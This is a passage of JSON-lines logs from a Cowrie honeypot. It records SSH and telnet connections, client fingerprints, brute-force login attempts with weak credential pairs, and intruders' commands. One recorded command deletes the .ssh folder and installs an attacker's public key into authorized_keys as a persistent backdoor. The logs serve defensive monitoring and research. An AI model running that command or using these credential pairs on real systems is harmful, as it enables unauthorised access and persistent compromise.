],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:30:09.185055Z","src_ip":"172.200.228.35","session":"cea5dd452a1b"}
{"eventid":"cowrie.login.failed","username":"sam","password":"sam","message":"login attempt [sam/sam] failed","sensor":"my-vps","timestamp":"2025-08-31T01:30:09.193355Z","src_ip":"80.94.95.15","session":"3e97b4a44d0e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:30:09.676936Z","src_ip":"172.200.228.35","session":"cea5dd452a1b"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:30:09.787661Z","src_ip":"172.200.228.35","session":"85c526b1dff7"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:30:09.788589Z","src_ip":"172.200.228.35","session":"cea5dd452a1b"}
{"eventid":"cowrie.login.failed","username":"sam","password":"sam1","message":"login attempt [sam/sam1] failed","sensor":"my-vps","timestamp":"2025-08-31T01:30:10.261094Z","src_ip":"80.94.95.15","session":"3e97b4a44d0e"}
{"eventid":"cowrie.login.failed","username":"sam","password":"sam123","message":"login attempt [sam/sam123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:30:11.328664Z","src_ip":"80.94.95.15","session":"3e97b4a44d0e"}
{"eventid":"cowrie.session.connect","src_ip":"82.67.125.95","src_port":53820,"dst_ip":"1.2.3.4","dst_port":22,"session":"0d24dd7b3a07","protocol":"ssh","message":"New connection: 82.67.125.95:53820 (1.2.3.4:22) [session: 0d24dd7b3a07]","sensor":"my-vps","timestamp":"2025-08-31T01:30:11.684315Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:30:11.685529Z","src_ip":"82.67.125.95","session":"0d24dd7b3a07"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:30:11.721404Z","src_ip":"82.67.125.95","session":"0d24dd7b3a07"}
{"eventid":"cowrie.login.failed","username":"alfa","password":"alfa","message":"login attempt [alfa/alfa] failed","sensor":"my-vps","timestamp":"2025-08-31T01:30:11.905527Z","src_ip":"82.67.125.95","session":"0d24dd7b3a07"}
{"eventid":"cowrie.login.failed","username":"sam","password":"sam1234","message":"login attempt [sam/sam1234] failed","sensor":"my-vps","timestamp":"2025-08-31T01:30:12.396591Z","src_ip":"80.94.95.15","session":"3e97b4a44d0e"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:30:12.943583Z","src_ip":"82.67.125.95","session":"0d24dd7b3a07"}
{"eventid":"cowrie.login.failed","username":"sam","password":"sam12345","message":"login attempt [sam/sam12345] failed","sensor":"my-vps","timestamp":"2025-08-31T01:30:13.464342Z","src_ip":"80.94.95.15","session":"3e97b4a44d0e"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:30:14.533542Z","src_ip":"80.94.95.15","session":"3e97b4a44d0e"}
{"eventid":"cowrie.session.closed","duration":30.804282665252686,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:30:18.927320Z","src_ip":"197.246.110.14","session":"cd6f805e6106"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45810,"dst_ip":"1.2.3.4","dst_port":23,"session":"04c7098ea4d2","protocol":"telnet","message":"New connection: 212.227.235.229:45810 (1.2.3.4:23) [session: 04c7098ea4d2]","sensor":"my-vps","timestamp":"2025-08-31T01:30:22.022623Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-31T01:30:22.224429Z","src_ip":"212.227.235.229","session":"04c7098ea4d2"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-31T01:30:23.517274Z","src_ip":"212.227.235.229","session":"04c7098ea4d2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":31575,"dst_ip":"1.2.3.4","dst_port":22,"session":"f1230e507754","protocol":"ssh","message":"New connection: 212.227.125.160:31575 (1.2.3.4:22) [session: f1230e507754]","sensor":"my-vps","timestamp":"2025-08-31T01:30:24.145634Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.8.1_DEV","message":"Remote SSH version: SSH-2.0-libssh2_1.8.1_DEV","sensor":"my-vps","timestamp":"2025-08-31T01:30:24.146997Z","src_ip":"212.227.125.160","session":"f1230e507754"}
{"eventid":"cowrie.client.kex","hassh":"2311efe7204dfc3007bb4ce758ac6a98","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc,none;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com,none;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc","none"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com","none"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2311efe7204dfc3007bb4ce758ac6a98","sensor":"my-vps","timestamp":"2025-08-31T01:30:24.203303Z","src_ip":"212.227.125.160","session":"f1230e507754"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"FTP","message":"login attempt [ftp/FTP] failed","sensor":"my-vps","timestamp":"2025-08-31T01:30:24.515337Z","src_ip":"212.227.125.160","session":"f1230e507754"}
{"eventid":"cowrie.session.closed","duration":2.619718551635742,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:30:24.642271Z","src_ip":"212.227.235.229","session":"04c7098ea4d2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45826,"dst_ip":"1.2.3.4","dst_port":23,"session":"19cdaf1172c5","protocol":"telnet","message":"New connection: 212.227.235.229:45826 (1.2.3.4:23) [session: 19cdaf1172c5]","sensor":"my-vps","timestamp":"2025-08-31T01:30:24.724987Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:30:24.969133Z","src_ip":"212.227.235.229","session":"19cdaf1172c5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:30:24.986128Z","src_ip":"212.227.235.229","session":"19cdaf1172c5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56804,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec99d6dcaa58","protocol":"ssh","message":"New connection: 212.227.235.229:56804 (1.2.3.4:22) [session: ec99d6dcaa58]","sensor":"my-vps","timestamp":"2025-08-31T01:30:25.442135Z"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:30:25.572751Z","src_ip":"212.227.125.160","session":"f1230e507754"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-31T01:30:26.066996Z","src_ip":"212.227.235.229","session":"19cdaf1172c5"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:30:26.288378Z","src_ip":"212.227.235.229","session":"ec99d6dcaa58"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:30:26.289171Z","src_ip":"212.227.235.229","session":"ec99d6dcaa58"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"2.1","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:30:27.117672Z","src_ip":"212.227.235.229","session":"19cdaf1172c5"}
{"eventid":"cowrie.session.closed","duration":2.3959574699401855,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:30:27.120867Z","src_ip":"212.227.235.229","session":"19cdaf1172c5"}
{"eventid":"cowrie.login.failed","username":"developer","password":"admin123","message":"login attempt [developer/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:30:32.413642Z","src_ip":"212.227.235.229","session":"ec99d6dcaa58"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:30:34.436440Z","src_ip":"212.227.235.229","session":"ec99d6dcaa58"}
{"eventid":"cowrie.session.connect","src_ip":"102.88.137.80","src_port":1481,"dst_ip":"1.2.3.4","dst_port":22,"session":"19d307fe2d91","protocol":"ssh","message":"New connection: 102.88.137.80:1481 (1.2.3.4:22) [session: 19d307fe2d91]","sensor":"my-vps","timestamp":"2025-08-31T01:30:35.828229Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:30:35.828938Z","src_ip":"102.88.137.80","session":"19d307fe2d91"}
{"eventid":"cowrie.client.kex","hassh":"713bd9cc935561939c02dad25af2d3de","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes256-ctr","aes256-cbc","aes128-gcm@openssh.com","aes128-ctr","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 713bd9cc935561939c02dad25af2d3de","sensor":"my-vps","timestamp":"2025-08-31T01:30:35.951665Z","src_ip":"102.88.137.80","session":"19d307fe2d91"}
{"eventid":"cowrie.login.success","username":"root","password":"Qazwsx@123","message":"login attempt [root/Qazwsx@123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:30:36.486713Z","src_ip":"102.88.137.80","session":"19d307fe2d91"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:30:37.192918Z","src_ip":"102.88.137.80","session":"19d307fe2d91"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:30:37.193785Z","src_ip":"102.88.137.80","session":"19d307fe2d91"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:30:37.195318Z","src_ip":"102.88.137.80","session":"19d307fe2d91"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:30:37.336998Z","src_ip":"102.88.137.80","session":"19d307fe2d91"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:30:37.603220Z","src_ip":"102.88.137.80","session":"19d307fe2d91"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T01:30:37.603901Z","src_ip":"102.88.137.80","session":"19d307fe2d91"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T01:30:37.728526Z","src_ip":"102.88.137.80","session":"19d307fe2d91"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:30:37.729389Z","src_ip":"102.88.137.80","session":"19d307fe2d91"}
{"eventid":"cowrie.session.connect","src_ip":"102.88.137.80","src_port":49834,"dst_ip":"1.2.3.4","dst_port":22,"session":"aa2711a13fc9","protocol":"ssh","message":"New connection: 102.88.137.80:49834 (1.2.3.4:22) [session: aa2711a13fc9]","sensor":"my-vps","timestamp":"2025-08-31T01:30:37.850576Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:30:37.851460Z","src_ip":"102.88.137.80","session":"aa2711a13fc9"}
{"eventid":"cowrie.client.kex","hassh":"713bd9cc935561939c02dad25af2d3de","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes256-ctr","aes256-cbc","aes128-gcm@openssh.com","aes128-ctr","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 713bd9cc935561939c02dad25af2d3de","sensor":"my-vps","timestamp":"2025-08-31T01:30:37.974165Z","src_ip":"102.88.137.80","session":"aa2711a13fc9"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T01:30:38.505936Z","src_ip":"102.88.137.80","session":"aa2711a13fc9"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:30:39.631593Z","src_ip":"102.88.137.80","session":"aa2711a13fc9"}
{"eventid":"cowrie.session.connect","src_ip":"102.88.137.80","src_port":49835,"dst_ip":"1.2.3.4","dst_port":22,"session":"888c05c58584","protocol":"ssh","message":"New connection: 102.88.137.80:49835 (1.2.3.4:22) [session: 888c05c58584]","sensor":"my-vps","timestamp":"2025-08-31T01:30:39.753332Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:30:39.754192Z","src_ip":"102.88.137.80","session":"888c05c58584"}
{"eventid":"cowrie.client.kex","hassh":"713bd9cc935561939c02dad25af2d3de","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes256-ctr","aes256-cbc","aes128-gcm@openssh.com","aes128-ctr","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 713bd9cc935561939c02dad25af2d3de","sensor":"my-vps","timestamp":"2025-08-31T01:30:39.876559Z","src_ip":"102.88.137.80","session":"888c05c58584"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:30:40.409974Z","src_ip":"102.88.137.80","session":"888c05c58584"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:30:40.540364Z","src_ip":"102.88.137.80","session":"19d307fe2d91"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:30:40.541487Z","src_ip":"102.88.137.80","session":"888c05c58584"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47838,"dst_ip":"1.2.3.4","dst_port":22,"session":"74ed750ea529","protocol":"ssh","message":"New connection: 212.227.125.160:47838 (1.2.3.4:22) [session: 74ed750ea529]","sensor":"my-vps","timestamp":"2025-08-31T01:30:48.169648Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:30:48.743712Z","src_ip":"212.227.125.160","session":"74ed750ea529"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-